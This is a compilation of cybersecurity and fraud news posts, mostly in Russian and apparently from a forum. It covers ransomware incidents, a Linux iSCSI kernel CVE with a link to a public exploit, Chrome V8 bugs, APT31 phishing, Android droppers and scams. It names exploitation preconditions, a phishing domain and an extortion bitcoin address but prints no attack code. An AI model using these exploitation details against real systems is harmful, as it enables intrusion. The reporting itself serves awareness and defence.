"The Company carries insurance, including cyber insurance, which it believes to be commensurate with its size and the nature of its operations and expects that a portion of these costs may be covered by insurance," ODP Corporation added.
The MSP is still working on restoring service delivery to customers since the ransomware hit its network and expects to "have service delivery restored to substantially all of its customers" by the end of March.
After discovering that DarkSide ransomware's operators started encrypting CompuCom's systems, the MSP disconnected their access to some customers to block the malware from spreading.
The company also notified the customers that they were compromised by malware soon after the attack, but didn't share any info about a possible ransomware attack.
After going through the first stages of the incident's investigation, CompuCom reached out to customers with a 'Customer FAQ Regarding Malware Incident' containing additional details.
According to the FAQ, the threat actors installed Cobalt Strike beacons on several systems in CompuCom's environment, beacons that allowed them to steal data, spread to other network devices, and eventually deploy the ransomware payloads on February 28.
DarkSide ransomware hit other organizations in the past, including the Brazilian Eletrobras and Copel energy companies, Discount Car and Truck Rentals, and Brookfield Residential.
В коде подсистемы iSCSI из состава ядра Linux [выявлена](https://blog.grimm- co.com/2021/03/new-old-bugs-in-linux-kernel.html) уязвимость ([CVE-2021-27365](https://security- tracker.debian.org/tracker/CVE-2021-27365)), позволяющая непривилегированному локальному пользователю выполнить код на уровне ядра и получить root- привилегии в системе. Для тестирования [доступен рабочий прототип эксплоита](https://github.com/grimm- co/NotQuite0DayFriday/tree/trunk/2021.03.12-linux-iscsi).
Уязвимость устранена в обновлениях ядра Linux 5.11.4, 5.10.21, 5.4.103, 4.19.179, 4.14.224, 4.9.260 и 4.4.260. Обновления пакетов с ядром доступны в дистрибутивах Debian, Ubuntu, SUSE/openSUSE, Arch Linux и Fedora. Для RHEL исправления пока не выпущены.
Проблема вызвана ошибкой в функции iscsi_host_get_param() из состава модуля libiscsi, внесённой ещё в 2006 году во время разработки подсистемы iSCSI. Из- за отсутствия должных проверок размера, некоторые строковые атрибуты iSCSI, такие как hostname или username, могут превышать значение PAGE_SIZE (4 КБ). Уязвимость может быть эксплуатирована через отправку непривилегированным пользователем Netlink-сообщений, устанавливающих атрибуты iSCSI в значения, превышающее PAGE_SIZE. При чтении данных атрибутов через sysfs или seqfs вызывается код, передающий атрибуты в функцию sprintf для копирования в буфер, размер которого равен PAGE_SIZE.
Эксплуатация уязвимости в дистрибутивах зависит от поддержки автоматической загрузки модуля ядра scsi_transport_iscsi при попытке создания сокета NETLINK_ISCSI. В дистрибутивах, в которых данный модуль загружается автоматически, атака может быть совершена независимо от использования функциональности iSCSI. При этом для успешного применения эксплоита дополнительно требуется регистрация как минимум одного транспорта iSCSI. В свою очередь, для регистрации транспорта можно использовать модуль ядра ib_iser, загружаемый автоматически при попытке создания непривилегированным пользователем сокета NETLINK_RDMA.
Автоматическая загрузка необходимых для применения эксплоита модулей поддерживается в CentOS 8, RHEL 8 и Fedora при установке в системе пакета rdma-core, который является зависимостью для некоторых популярных пакетов и по умолчанию устанавливается в конфигурациях для рабочих станций, серверных систем с GUI и хост-окружений виртуализации. При этом rdma-core не устанавливается при использовании серверной сборки, работающей только в консольном режиме, и при установке минимального инсталляционного образа. Например, пакет входит в базовую поставку Fedora 31 Workstation, но не включён в Fedora 31 Server. Debian и Ubuntu менее подвержены проблеме, так как пакет rdma-core загружает необходимые для атаки модули ядра только при наличии оборудования RDMA.
В качестве обходного пути защиты можно запретить автоматическую загрузку модуля libiscsi:
Code:Copy to clipboard
echo "install libiscsi /bin/true" >> /etc/modprobe.d/disable-libiscsi.conf
Дополнительно, в подсистеме iSCSI устранены ещё две менее опасные уязвимости, которые могут привести к утечке данных из ядра: CVE-2021-27363 (утечка сведений о дескрипторе транспорта iSCSI через sysfs) и CVE-2021-27364 (чтение из области вне границ буфера). Указанные уязвимости могут использоваться для взаимодействия через netlink-сокет с подсистемой iSCSI без наличия необходимых привилегий. Например, непривилегированный пользователь может подключиться к iSCSI и отправить команду завершения сеанса.
Researchers revealed that there is a perpetual threat in the utility sector about the next vulnerability to be exploited by cybercriminals. Several prominent incidents manifest the claim.
Суд приговорил к штрафу жителя Винницы за создание вредоносного программного обеспечения.
В ходе досудебного расследования было установлено, что в июне 2017 года подсудимый приобрел у неустановленного следствием лица и загрузил на свой ноутбук программу «All-in-Оne-Checker».
В дальнейшем злоумышленник модифицировал вышеуказанную программу и использовал её для получения персональных данных пользователей, о чем, согласно заключению эксперта, свидетельствует содержание имеющегося на изъятых носителях каталога «Results», который содержится в папке с исполняемым файлом «АІОС.ехе».
Указанные действия подсудимого органом досудебного расследования были квалифицированы по ч. 1 ст. 361-1 УК Украины (создание с целью использования вредоносных программных средств, предназначенных для несанкционированного вмешательства в работу компьютерных сетей).
В сентябре 2020 года между подозреваемым и прокурором было заключено соглашение о признании виновности, согласно которому стороны договорились о формулировке обвинения, всех существенных для данного уголовного производства обстоятельств, подозреваемый в полном объеме сформулированного обвинения безоговорочно признал свою виновность в совершении данного уголовного преступления. Также, сторонами сделки определено согласованное ими наказания в виде штрафа в размере 8500 гривен (500 необлагаемых минимумов доходов граждан).
Суд утвердил вышеуказанное соглашение. Кроме этого, подсудимый должен оплатить сумму в размере 16018 гривен за проведение судебных компьютерно-технических экспертиз.
«Лаборатория Касперского» заявила, что обнаружила новое вредоносное ПО, которое, по всей видимости, было разработано Центральным разведывательным управлением США. Фирма сообщила, что обнаружила зловред в «наборе образцов вредоносного ПО», полученном аналитиками и другими службами безопасности в феврале 2019 года.
Хотя первоначальный анализ не обнаружил сходства кода с какими-либо ранее известными образцами вредоносных программ, но «Лаборатория Касперского» недавно повторно проанализировала файлы и обнаружила, что в них есть «пересечения шаблонов кодирования, стиля и методов, которые были замечены в различных программах семейства Lambert». Под этим кодовым названием фирма отслеживает хакерские операции ЦРУ.
Четыре года назад, после того как WikiLeaks раскрыла общественности возможности ЦРУ в серии утечек, известных как Vault7, американская охранная компания Symantec публично связала хакерские инструменты Vault7 с ЦРУ и Longhorn APT (еще одно отраслевое название Lambert).
«Лаборатория Касперского» говорит, что, учитывая общее сходство между этими недавно обнаруженными образцами и прошлыми вредоносными программами ЦРУ, новый кластер вредоносных программ получил название Purple Lambert.
Судя по метаданным Purple Lambert, образцы вредоносного ПО были собраны семь лет назад, в 2014 году. ИБ-исследователи заявили, что не фиксировали реальных случаев использования этого ПО, но считают, что его развернули не позднее 2015 года.
В описании Purple Lambert сказано, что вредоносное ПО действовало как бэкдор- троян, который прослушивал сетевой трафик для определенных пакетов, которые могли активировать его на зараженных хостах.
«Лаборатория Касперского» приводит полное описание зловреда в ежеквартальном отчете. По данным фирмы, Purple Lambert состоит из нескольких модулей, а его сетевой модуль способен предоставить злоумышленнику основную информацию о зараженной системе и выполнить полученную полезную нагрузку. Его функциональность напоминает Grey Lambert, который, в свою очередь, сменил White Lambert. Кроме того, Purple Lambert реализует функциональность, аналогичную и Gray Lambert, и White Lambert.
За исключением утечек Shadow Brokers и Vault7, новости об операциях кибершпионажа в США и хакерских инструментах крайне редки в сфере кибербезопасности. После утечки из Vault7 было зафиксировано всего три сообщения о вредоносных программах и хакерских операциях со стороны США.
Первым был отчет «Лаборатории Касперского» от марта 2018 года, в котором разоблачались операции по сбору разведывательной информации Киберкомандования США, направленные на боевиков ИГ на Ближнем Востоке.
Вторым был отчет ESET за ноябрь 2019 года, в котором был разоблачен DePriMon, еще один штамм вредоносного ПО, связанный с ЦРУ и Lambert.
Третий отчет был опубликован в марте 2020 года китайской охранной фирмой Qihoo 360. В нем говорилось об 11-летней хакерской операции ЦРУ, направленной на сектор гражданской авиации Китая.
• Source: https://securelist.com/apt-trends-report-q1-2021/101967/
Google выпустила новую версию Chrome для Windows, Mac и Linux с исправлениями для двух недавно обнаруженных уязвимостей. По данным компании, для этих багов уже доступны эксплоиты. Проблемы получили идентификаторы CVE-2021-21206 и CVE-2021-21220.
Уязвимость CVE-2021-21206 была обнаружена в JavaScript-движке V8 и связана с опубликованным ранее на этой неделе RCE-эксплоитом. Напомню, что данный баг использовался для компрометации Chrome и Edge на недавно завершившемся конкурсе Pwn2Own экспертами из команды Dataflow Security, которые у итоге получили 100 000 долларов за эту уязвимость. Эксплоит же был опубликован несколькими днями позже индийским исследователем Раджвардханом Агарвалом (Rajvardhan Agarwal), который сумел найти баг, изучая патчи в исходном коде V8.
В Google подтвердили, что исправление связано именно с этой проблемой, а также объяснили, что уязвимость возникала из-за некорректной проверки ненадежных входных данных в V8 для x86-64.
Интересно, что Агарвал сообщил изданию The Hacker News, что существует еще одна уязвимость, исправленная в последней версии V8, патч для которой не вошел в обновленную версию Chrome.
«Хотя обе проблемы различны по своей природе, обе могут использоваться для выполнения произвольного кода в процессе рендеринга. Подозреваю, что первый патч вошел в состав обновления Chrome из-за опубликованного [мной] эксплоита, но поскольку второй патч в эту версию Chrome не вошел, [уязвимость] все еще можно использовать», — говорит специалист.
Click to expand...
Вторая уязвимость, исправленная в браузере Google (CVE-2021-21220), относится к типу use-after-free и была найдена в движке Blink. Известно, что о ней компанию 7 апреля уведомил анонимный исследователь.
Источник: xakep.ru/2021/04/14/chrome-bugs/
В эти выходные Facebook столкнулась с обнародованием больших личных данных пользователей.
На хакерских форумах (в том числе и у нас(!)) опубликованы Facebook ID, номера телефонов, адреса и имена, некоторые биографические данные более 500 миллионов пользователей (примерно 533,000,000) из более чем 100 стран.
Раскрытые сегодня сведения включают в себя как новые, так и некоторые утечки предыдущих лет, что и делает эту утечку самой большой базой Facebook на сегодняшний день.
Администрация Facebook пока не отреагировала на сообщения о крупной утечки личной информации пользователей.
Разработчики криптовалюты Tether (USDT) сообщают, что неизвестные лица вымогают у них 500 биткойнов (примерно 24 000 000 долларов по текущему курсу). В случае если компания откажется платить, мошенники обещают обнародовать якобы похищенные у нее данные.
Еще на прошлой неделе Twitter-аккаунты Deltecleaks и TetherLeaks стали распространять скриншоты якобы украденных у Tether документов и электронных писем, а также данные одного из банковских партнеров компании, Deltec Bank.

Представители Tether заявляют, что эта утечка — фейк, а документы, которые выкладывают преступники, подделка.
«Сегодня мы получили требование выкупа в размере 500 BTC, которые нужно отправить на адрес bc1qa9f60pved3w3w0p7snpxlnh5t4uj95vxn797a7. Отправители письма заявляют, что, если они не получат BTC до завтра, они сольют документы широкой общественности, чтобы “нанести вред экосистеме биткойнов”. Мы не станем платить», — гласит заявление компании.
Click to expand...
В Tether отмечают, что пока неясно, является ли это обычной вымогательской атакой, какие часто нацеливают на криптовалютные компании, или злоумышленники действительно стремятся саботировать работу Tether и нанести удар по криптосообществу в целом.
«Хотя мы считаем, что это довольно жалкая попытка вымогательства, мы относимся к ней серьезно. Мы уже уведомили правоохранительные органы об этих сообщениях и связанных с ними требованиях выкупа. Как всегда, мы полностью поддержим правоохранительные органы в расследовании этой мошеннической схемы», — гласит Twitter компании.
Click to expand...
Источник: xakep.ru/2021/03/02/tether-blackmail/
На днях в Австралии началось расследование деятельности схемщика Майкла Прайда ( Michael Pryde ), 31-летнего создателя Just the Bets - системы заработка на онлайн-ставках. Прайд продавал «алгоритмы выигрыша» богатой прослойке общества: юристам, бизнесменам, «золотой молодежи», знаменитостям и так далее.
Он гарантировал 100% верность своих прогнозов, однако когда им заинтересовались правительственные службы, выяснилось, что у парня нет ни лицензии на гэмблинг-операции, ни образования, ни квалификации. Прайд просто морочил толстосумам головы, показывая им фейковый банковский счет с 2,6 миллионами австралийских долларов. На деле за душой Майкла было лишь пару тысяч баксов.
За него взялись всерьез: и полиция, и налоговая, и банки с его якобы «счетами»
Бьёрн Страуструп (Bjarne Stroustrup), создатель языка C++, [опубликовал возражения](https://www.open- std.org/jtc1/sc22/wg21/docs/papers/2023/p2739r0.pdf) против выводов, сделанных в отчёте АНБ, в котором организациям было рекомендовано отойти от использования языков программирования, таких как Си и Си++, перекладывающих управление памятью на разработчика, в пользу языков, таких как C#, Go, Java, Ruby, Rust и Swift, обеспечивающих автоматическое управление памятью или выполняющих проверки безопасной работы с памятью во время компиляции.
По мнению Страуструпа упомянутые в отчёте АНБ безопасные языки на деле не превосходят C++ в важных с его точки зрения применениях. В частности, развиваемые последние годы базовые рекомендации по использованию C++ (C++ Core Guidelines) охватывают методы безопасного программирование и предписывают применение средств, гарантирующих безопасную работу с типами и ресурсами. При этом разработчикам, которым не требуются подобные строгие гарантии безопасности, оставляется возможность продолжения использования старых методов разработки.
Страуструп считает, что хороший статический анализатор, соответствующий рекомендациям C++ Core Guidelines, может обеспечить необходимые гарантии безопасности C++ кода, требуя значительно меньше затрат, чем переход на новые безопасные языки программирования. Например, большинство рекомендаций Core Guidelines уже реализованы в статическом анализаторе и профиле безопасной работы с памятью из состава Microsoft Visual Studio. Часть рекомендаций также учтена в статическом анализаторе Clang tidy.
Объектом критики также стало акцентирование отчёта АНБ только на проблемах работы с памятью, оставляя без внимания многие другие проблемы языков программирования, влияющие на безопасность и надёжность. Страуструп рассматривает безопасность как более широкое понятие, различные грани которого могут быть достигнуты комбинацией стиля написания кода, библиотек и статических анализаторов. Для управления включением правил, обеспечивающих безопасность работы с типами и ресурсами, предлагается использовать аннотации в коде и опции компиляторов.
В приложениях, в которых производительность важнее безопасности, подобный подход даёт возможность выборочного применения средств, гарантирующих безопасность только там, где это необходимо. Инструменты повышения безопасности также можно применять частично, например, вначале ограничиться правилами проверки диапазонов и инициализации, а затем постепенно адаптировать код для более строгих требований.
Федеральная служба по финансовому мониторингу (Росфинмониторинг) выбрала подрядчика для работ по созданию модуля мониторинга и анализа криптовалютных транзакций с использованием биткоина за 14,7 млн руб. Им стала компания «Эр си о» (RCO), следует по информации сайта госзакупок. RCO принадлежит «Рамблер интернет холдинг», которым, в свою очередь, владеет Сбербанк.
Тендер был опубликован 29 июня 2021 г., подведение итогов состоялось 29 июля. Начальная (максимальная) цена закупки — 19,6 млн руб. Помимо компании Сбербанка, в конкурсе принимали участие университет «Иннополис» и компания «Софт компани». При этом университет предлагал исполнить контракт за 10,1 млн руб., однако заявки оценивались не только по ценовым критериям.
Модуль мониторинга станет частью единой информационной системы Росфинмониторинга. При его создании должна использоваться ОС Linux. Сам модуль должен быть готов к 10 декабря 2021 г.
За кем Росфинмониторинг будет следить
Среди целей работ по созданию модуля мониторинга — повышение эффективности деятельности финансовых институтов и их законопослушности с учетом выявленных рисков отмывания доходов, полученных преступным путем, финансирования терроризма и экстремизма, финансирования распространения оружия массового уничтожения, говорится в документации. Кроме того, Росфинмониторинг планирует с помощью модуля криптомониторинга снизить риски финансирования незаконного оборота наркотиков, а также «обеспечить сохранность и целевое использование бюджетных средств».
Модуль обеспечит ведомству прослеживание цепочки перемещения цифровых финансовых активов, а также ведение базы данных криптовалютных кошельков, связанных с осуществлением противоправной деятельности. Помимо этого, Росфинмониоринг планирует следить за поведением участников криптовалютного рынка с целью их идентификации, составления профилей участников и оценки их роли в экономической деятельности, а также выявления вероятности их участия в противоправной деятельности, следует из технического задания к закупке.
Законно ли это
В публичном блокчейне, таком как Bitcoin или Ethereum, все транзакции являются общедоступными по умолчанию, и изучать их может кто угодно, пояснил эксперт Moscow Digital School Ефим Казанцев РБК. По его мнению, система Росфинмониторинга может быть направлена на деанонимизацию пользователей, подозреваемых в противоправной деятельности.
При этом биткоин-транзакции отправляются в незашифрованных пакетах через интернет, что позволяет отследить IP-адрес отправителя, пояснила изданию директор по развитию криптобиржи EXMO Мария Станкевич. Зная IP-адрес, можно будет узнать личные данные отправителя, а по активности кошелька — его часовой пояс.
Также эксперты, опрошенные РБК, добавили, что система Росфинмониторинга может отслеживать движение средств во всех блокчейнах открытого типа, например, Ethereum, Tron, Tezos, EOS, Cardano, Stellar и др.
Система финансовой разведки
В июле 2021 г. CNews писал о планах Росфинмониторинга в 2022 г. запустить информационную систему «Международный центр оценки рисков отмывания денег и финансирования терроризма». Ее пользователями станут службы финансовых разведок России, Армении, Белоруссии, Казахстана, Киргизии и Таджикистана.
Система будет содержать сведения из информационных систем финансовых разведок, а также открытые данные по тематике противодействия отмыванию доходов и финансированию терроризма, сообщили CNews представители Росфинмониторинга.
SMB-червь Indexsinas вышел на очередную охоту за уязвимыми машинами. В ходе сложной цепочки атак вредонос, способный самостоятельно распространяться, использует инструменты Агентства национальной безопасности (АНБ) США и устанавливает на устройство жертвы вредоносный криптомайнер.
Под прицелом киберпреступников оказались медицинские учреждения, а также образовательный и телекоммуникационный сектора. За счёт таких организаций злоумышленники добывают цифровую валюту.
Indexsinas ещё называют NSABuffMiner, атаки этого червя уходят корнями в 2019 год. Операторы вредоноса используют известный набор инструментов Equation Group, в который входят эксплойты EternalBlue и EternalRomance, а также бэкдор DoublePulsar.
Все эти злонамеренные тулзы Indexsinas использует для проникновения в общие папки Windows SMB. Далее червь уже перемещается латерально, постепенно и методично заражая корпоративную сеть.
«Самостоятельное распространение червя достигается за счёт использования сканера портов с открытым исходным кодом вкупе с эксплойтами EternalBlue, DoublePulsar и EternalRomance. Эти инструменты позволяют атакующим получить привилегированный доступ и установить бэкдоры», — пишут специалисты Guardicore Labs, проанализировавшие активность Indexsinas.
Также исследователи отметили тщательную подготовку и планирование кибератак операторов Indexsinas. На протяжении нескольких лет злоумышленники пользуются одним командным сервером (C&C), расположенным в Южной Корее.
Сам сервер отлично защищён, на него установлены все актуальные патчи, а в Сеть не торчит ничего лишнего. Сразу видно — работа профессионалов.
Экспертный центр безопасности компании Positive Technologies (PT Expert Security Center, PT ESC) выявил новые атаки группировки APT31 и изучил ее новый инструментарий — вредоносное ПО, использующее функции удаленного доступа и позволяющее злоумышленникам контролировать компьютер или сеть жертвы. Исходным вектором атак стал фишинг — один из самых распространенных видов социальной инженерии. По данным экспертов, в общей сложности с января по июль текущего года по миру было отправлено более десятка вредоносных рассылок, а следы злоумышленников обнаружены в Монголии, США, Канаде и Республике Беларусь. Теперь группировка APT31, известная атаками на госорганы разных стран, проявила активность и в России.
В рамках исследования угроз информационной безопасности (threat intelligence) специалисты PT Expert Security Center обнаружили отправляемые в Монголию рассылки с вредоносным содержимым, не встречавшимся ранее. Впоследствии аналогичные атаки были выявлены в России, США, Канаде и Республике Беларусь. Детальный анализ вредоносного ПО, а также многочисленные пересечения по функционалу, применяемым техникам и механизмам — начиная с внедрения вредоносного кода и до используемых логических блоков и структур, — позволили экспертам Positive Technologies соотнести выявленные образцы с активностью группы APT31.
APT31 (она же Hurricane Panda и Zirconium) активна по меньшей мере с 2016 года, ее ключевые интересы — кибершпионаж и сбор конфиденциальных данных, представляющих стратегическую важность. Группа проявляет особый интерес к госсектору по всему миру: ее жертвами в разное время становились правительство Финляндии, и, предположительно, правительства Норвегии и Германии. Ряд исследователей предполагает, что за серией атак на организации и лица, близкие к кандидатам в президенты США, во время предвыборной компании 2020 года тоже стоит APT31. В числе других целей группировки — аэрокосмические и оборонные предприятия, международные финансовые компании, сектор высоких технологий, телекоммуникационная отрасль и медиа.
В ходе исследования одного из последних образцов вредоносного ПО специалисты PT ESC обнаружили ссылку на фишинговый домен inst.rsnet-devel[.]com, имитирующий домен федеральных органов государственной власти и органов государственной власти субъектов РФ для сегмента сети Интернет. По мнению экспертов Positive Technologies, такой вредоносный домен предназначен для того, чтобы ввести в заблуждение как самих госслужащих, так и те компании, которые работают с госструктурами.
Positive Technologies участвует в обмене данными о компьютерных инцидентах в рамках системы ГосСОПКА, координатором работы которой выступает Национальный координационный центр по компьютерным инцидентам (НКЦКИ, cert.gov.ru). В рамках этой инициативы российские компании тех отраслей, которые находятся сейчас в зоне повышенного риска, получат от центра соответствующие уведомления.
«В последние годы фишинг остается одним из самых эффективных инструментов в руках атакующих. Для повышения результативности фишинговых атак злоумышленники создают объекты, имитирующие информационные ресурсы государственных органов, используют подлинные документы и другие достоверные сведения, добытые в ходе компьютерных атак. Это позволяет им формировать письма, вызывающие доверие получателей, а открытие таких писем приводит к проникновению злоумышленников внутрь системы с целью кражи информации, финансовых сведений и проведения деструктивных действий. В последнее время информационные системы государственных органов стали одним из основных объектов устремлений кибергруппировок. Для успешного противодействия таким атакам необходимо оперативное распространение информации об используемых злоумышленниками средствах и методах атак и способах их выявления. Такой механизм реализуется в рамках ГосСОПКА», — отмечает заместитель директора Национального координационного центра по компьютерным инцидентам Николай Мурашов.
«За год у APT31 появились новые версии вредоносного ПО, которые злоумышленники сегодня активно используют, инфраструктура группы, как мы видим, тоже разрастается — все это, вкупе с тем, что ранее группировка не атаковала Россию, позволяет предположить, что она расширяет географию интересов на страны, где ее растущая активность может быть обнаружена, в частности на нашу страну, — рассказывает Денис Кувшинов, глава отдела исследования угроз ИБ Positive Technologies. — Мы полагаем, что в ближайшее время будет выявлено применение этой группой в атаках, в том числе на Россию, и другого инструментария, который можно будет идентифицировать по кодовому соответствию либо сетевой инфраструктуре».
В атаках APT31, изученных специалистами PT ESC за январь — июль текущего года, злоумышленниками использовался одинаковый дроппер. Как показало исследование, его задача — создать на зараженном компьютере вредоносную библиотеку и уязвимое для DLL Sideloading приложение. Запущенное дроппером приложение вызывает одну из функций подгруженной вредоносной библиотеки, после чего управление передается вредоносному коду.
«По сути, обнаруженный зловред — это троян удаленного доступа (remote access trojan, RAT), позволяющий APT-группе отслеживать и контролировать компьютеры либо сеть своих жертв, — рассказал Даниил Колосков, старший специалист отдела исследования угроз ИБ Positive Technologies. — Стоит отметить хитрость разработчиков ВПО: чтобы “приблизить” вредоносную библиотеку к оригинальной версии, ее назвали MSVCR100.dll — библиотека с точно таким же именем входит в Visual C++ для Microsoft Visual Studio и есть почти на всех компьютерах. Кроме того, в качестве экспортов в ней содержатся имена, которые можно найти в легитимной MSVCR100.dll».
В ходе анализа экземпляров вредоносного ПО специалисты PT ESC обнаружили различные версии дропперов, содержащих один и тот же набор функций. При этом в ряде случаев, например при атаках на Монголию, дроппер был подписан валидной цифровой подписью. По мнению экспертов Positive Technologies, она, скорее всего, была украдена, что также говорит о хорошо подготовленной группировке.
Команда PT Expert Security Center продолжает отслеживать активность группы APT31 в России и других странах и не прогнозирует снижение числа ее кибератак в ближайшие месяцы. По словам экспертов компании, организация может обнаружить подобные атаки и противодействовать им при помощи систем выявления инцидентов ИБ (SIEM), систем глубокого анализа трафика (NTA) и решений класса «песочница» (sandbox). Для сокращения потенциального окна возможностей злоумышленников специалисты Positive Technologies рекомендуют компаниям добавить представленные в отчете индикаторы компрометации в свои средства защиты, а их сотрудникам — оперативно сообщать офицерам ИБ о полученных спам-рассылках.
Мошенники научились красть и продавать чужие квартиры через Госуслуги.
Юристы рассказали, что скамерам достаточно найти в сети данные паспорта, СНИЛС и ИНН владельца жилья, чтобы продать квартиру даже без его ведома.
Такие сделки проводятся дистанционно при помощи электронно-цифровой подписи.
Как избежать потери своего жилья?
Необходимо подать через Госуслуги в Росреестр заявление о запрете на действия с недвижимостью без личного присутствия собственника.
Сохраняем и распространяем!
CVE-2022-39197
Cobalt Strike 4.7.1 is live and contains fixes for a couple of issues that were identified in the 4.7 release for which there was no workaround.
 www.cobaltstrike.com
Сотрудники отдела противодействия киберпреступлениям в Ивано-Франковской области совместно со следователями Коломыйского районного отдела полиции при процессуальном руководстве окружной прокуратуры задокументировали преступную деятельность 28-летней жительницы Коломиї.
Как выяснили полицейские, для своей конспирации злоумышленница использовала несколько онлайн-магазинов, для создания которых специально регистрировала аккаунты в популярной социальной сети. Для того, чтобы заинтересовать покупателей, женщина предлагала товар по значительно сниженным ценам. После, получала полную или частичную подписку, а затем исчезала.
Таким образом злоумышленнице удалось обмануть потенциальных покупателей из разных регионов Украины.
В ходе санкционированного обыска по месту жительства мошенницы, правоохранители изъяли компьютерную технику, мобильные телефоны, на которых установлено наличие учетных записей, подтверждающих факты преступной деятельности, сим-карты различных операторов и банковские карточки.
Злоумышленнице следователи сообщили о подозрении в совершении преступления, предусмотренного ч. 3 ст. 190 Уголовного кодекса Украины (Мошенничество). Санкция статьи предусматривает до трех лет лишения свободы.
Продолжается следствие.
• Source: npu.gov.ua/news/kiberzlochini/na-Ivano-frankivshhini-kiberpolicziya- vikrila-prikarpatku-na-internet-shaxrai-stvax/
Эксперты компании Check Point вновь обнаружили малварь в Google Play Store. На этот раз в составе девяти приложений был найден дроппер Clast82, который занимался распространением банкера AlienBot и трояна MRAT.

Сообщается, что вредоносной активностью занимались приложения Cake VPN, Pacific VPN, eVPN, BeatPlayer, QR/Barcode Scanner MAX, Music Player, tooltipnatorlibrary и QRecorder. Все они копировали функциональность существующих опенсорсных приложений, и были удалены из официального каталога в начале февраля. Суммарно эти приложения были установлены около 15 000 раз.
Чтобы избежать обнаружения в качестве управляющей платформы разработчик малвари использовал Firebase, а также задействовал GitHub загрузки пейлоадов. К тому же, по информации исследователей, дроппер сам «решал», когда активировать вредоносные функции. По сути, параметр имел значение «false» до тех пор, пока приложение не проходило все проверки Google и не публиковалось в Google Play Store.

«Если зараженное устройство препятствует установке приложений из неизвестных источников, Clast82 показывает пользователю фальшивый запрос, выдавая себя за Google Play Services, и запрашивает у пользователя разрешение на установку каждые пять секунд», — рассказывают эксперты.
Click to expand...

При этом для каждого вредоносного приложения хакер отдельный аккаунт разработчика в Google Play и репозиторий на GitHub. Это позволило злоумышленнику удобно распределять различные пейлоды между зараженными устройствами.

Что касается полезных нагрузок, MRAT используется для удаленного доступа к взломанному устройству, а AlienBot представляет собой MaaS (Malware-as-a- Service), которое позволяет злоумышленнику внедрять вредоносный код в легитимные финансовые приложения жертвы. В итоге атакующий получает доступ к учетным записям пользователя и полный контроль над его устройством.
Источник: xakep.ru/2021/03/09/clast82-play-store/
The data breaches caused by the Clop ransomware gang exploiting a zero-day vulnerability have led to a sharp increase in the average ransom payment calculated for the first three months of the year.
Clop’s attacks did not encrypt a single byte but stole data from large
companies that relied on Accellion’s legacy File Transfer Appliance (FTA) and
tried to extort them with high ransom demands.
The incidents started in December 2020 and continued in January 2021. In
February, Clop had already started to publish data from victims that refused
to pay them.
These attacks set to $220,298 the average ransom payment in the first quarter of 2021, which translates to a 43% increase compared to the last quarter of 2020, notes ransomware remediation firm Coveware.
The median ransom payment is also up, by almost 60%, reaching $78,398 from $49,450.
Ransom
payment trends
Coveware [says](https://www.coveware.com/blog/ransomware-attack-vectors-shift-
as-new-software-vulnerability-exploits-abound) that the figures are the result
of Clop ransomware being particularly active in Q1 and demanding large ransoms
from big companies they had breached.
Although Accellion’s FTA software solution was used by a small number of companies (around 100), the names on the list stand out:
Given the high profile of the targets, the Clop ransomware gang likely yielded high returns from the extortion campaigns, with many victims ending up paying big money to stop a data leak.
“Dozens of CloP victims were extorted for tens of millions of dollars even
though the majority of the victims opted not to pay and were subsequently
doxxed on the CloP leak site” -
[Coveware](https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-
new-software-vulnerability-exploits-abound)
Clop’s Accellion campaign seems to have reached an end in early April, as the
gang started returned to data encryption operations made possible by typical
network access vectors.
Despite being responsible for the increased average and median ransom payments, the Clop ransomware gang was not the most active since the beginning of the year.
As per Coveware’s data, the market share for ransomware attacks is dominated by REvil, Conti, and Lockbit operations, followed by Clop.
Most
prevalent ransomware in Q1 2021
Coveware says that some of these ransomware operations have become so big and
complex that they made technical-level mistakes that affected the credibility
they’ve been building to make victims pay.
Conti outsourced chat operations, which made negotiations and victim recovery more difficult. Furthermore, the gang targeted the same victim multiple times, sometimes immediately after an initial attack.
Some REvil ransomware attacks ended with losing all the data because of “technical flaws that resulted in victims unable to match encryption keys.”
Data loss issues also occurred during some Lockbit attacks. Furthermore, this actor tried to extort their victims multiple times, says Coveware CEO Bill Siegel.
Despite these issues, which victims should see as a warning not to pay the ransom, the threat actors in the ransomware business are looking to extend operations to Linux and Unix machines.
Siegel says that multiple actors, like Defray777, Mespinoza, Babuk, Nephilim, and Darkside, are already focusing on this direction. Another actor that announced this move is REvil.
As for the most common initial access vector, Siegel says that remote desktop protocol (RDP) is still at the top, followed by email phishing, and software vulnerabilities.
Ransomware
initial attack vectors Q1 2021
Companies falling victim to ransomware attacks are recommended not to pay the
extortionists so they are less encouraged to continue the practice.
Additionally, paying the hackers gives a false sense of security that data
won’t be leaked or traded on underground forums.
Coveware says that before deciding on paying the threat actor victims of data exfiltration should consider that there is no guarantee that the attacker destroyed the data, or would not sell or keep it for future extortion.
Moreover, stolen data passed multiple hands without being secured and there is no way to tell that there are no copies left even if the threat actor keeps their end of the deal and destroys it.
Ransomware initial attack vectors Q1 2021
Companies falling victim to ransomware attacks are recommended not to pay the
extortionists so they are less encouraged to continue the practice.
Additionally, paying the hackers gives a false sense of security that data
won’t be leaked or traded on underground forums.
Coveware says that before deciding on paying the threat actor victims of data exfiltration should consider that there is no guarantee that the attacker destroyed the data, or would not sell or keep it for future extortion.
Moreover, stolen data passed multiple hands without being secured and there is no way to tell that there are no copies left even if the threat actor keeps their end of the deal and destroys it.
Они мошенническими способами отнимали у бежавших за границу российских граждан сбережения в интересах ВСУ
Сотрудниками этих колл-центров осуществлялось хищение денежных средств российских и иностранных граждан в особо крупном размере
Сотрудники Управления ФСБ России по городу Москве и Московской области совместно со столичными полицейскими пресекли противоправная деятельность мошенников, организовавших колл-центры в городе Москве.
«Сотрудниками этих колл-центров осуществлялось хищение денежных средств российских и иностранных граждан в особо крупном размере», - сообщает ФСБ России и публикует задержания в офисе шестерых мошенников.
Как стало известно, преступники представляясь гражданами сотрудниками российских силовых ведомств, а также работниками финансовых учреждений. Они обманным путем побуждали граждан сделать перевод своих средств на подконтрольные им банковские карты.
«Полученные таким образом финансовые средства обналичивались в банкоматах, расположенных в различных регионах России, и курьерами доставлялись в специализированные обменные пункты, где конвертировались в криптовалюту и переводились через анонимные криптокошельки на счета получателей в Украине», - пояснили в ФСБ России.
В ведомстве отметили, что в ряде случаев преступники оказывали на граждан моральное давление. Они запугивали потерпевших в целях выведения их из состояния психологического равновесия и побуждали к совершению резонансных преступлений против общественной безопасности на территории Московского региона.
При этом мошенники имели любопытную специализацию. Они использовали схему, которая помогала им обманывать российских граждан, которые по каким-то причинам уехали из России в Германию, Испанию и Францию. Так называемые релоканты.
